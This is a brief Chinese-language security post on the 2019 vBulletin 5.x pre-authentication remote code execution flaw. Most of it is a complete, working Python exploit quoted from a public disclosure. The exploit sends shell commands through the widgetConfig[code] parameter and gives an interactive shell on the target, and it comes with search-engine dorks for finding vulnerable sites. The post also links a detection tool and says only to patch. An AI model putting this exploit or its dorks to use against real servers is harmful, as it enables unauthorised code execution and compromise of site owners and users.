0x00 概述

201909 vbulletin5(5.0.0-5.5.4)爆出rce漏洞，利用文件ajax/render/widget_php和post参数widgetConfig[code]可直接远程代码执行。

 

0x01 漏洞重现

https://seclists.org/fulldisclosure/2019/Sep/31

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
# 
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
 
import requests
import sys
 
if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
 
params = {"routestring":"ajax/render/widget_php"}
 
while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

 

0x02 检测工具

https://github.com/theLSA/vbulletin5-rce

 

0x03 修复方案

打补丁。